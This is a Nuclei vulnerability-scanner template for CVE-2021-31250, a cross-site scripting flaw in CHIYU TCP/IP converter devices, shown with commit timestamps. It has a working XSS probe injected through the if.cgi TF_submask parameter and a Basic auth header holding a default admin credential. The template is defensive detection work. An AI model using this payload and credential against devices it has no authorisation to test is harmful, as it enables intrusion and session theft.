nuclei-templates/http/cves/2021/CVE-2021-31250.yaml

51 lines
2.2 KiB
YAML
Raw Normal View History

2021-07-26 17:18:45 +00:00
id: CVE-2021-31250
info:
name: CHIYU TCP/IP Converter - Cross-Site Scripting
2021-07-26 17:18:45 +00:00
author: geeknik
severity: medium
description: CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation: |
To mitigate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being rendered in web pages.
reference:
- https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
- https://www.chiyu-tech.com/msg/message-Firmware-update-87.htm
- https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/
- https://nvd.nist.gov/vuln/detail/CVE-2021-31250
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-31250
cwe-id: CWE-79
epss-score: 0.97079
epss-percentile: 0.99724
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: chiyu-tech
product: bf-430_firmware
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech
2021-07-26 17:18:45 +00:00
http:
2021-07-26 17:18:45 +00:00
- method: GET
path:
- "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"
2023-07-11 19:49:27 +00:00
headers:
Authorization: Basic OmFkbWlu
host-redirects: true
2023-07-11 19:49:27 +00:00
2021-07-26 17:18:45 +00:00
matchers-condition: and
matchers:
- type: word
part: header
words:
2023-07-11 19:49:27 +00:00
- text/html
2021-07-26 17:18:45 +00:00
- type: word
part: body
words:
2023-07-11 19:49:27 +00:00
- '"><script>alert({{randstr}})</script>'
# digest: 4b0a00483046022100810894adfb469036d6eab58382a9b2bf537deac298e2ea4091c823685d6fc78102210086f748ae81dd4e3f92ceb7a74a89abca17cd19093315b4586aa418d95e5534bb:922c64590222798bb761d5b6d8e72950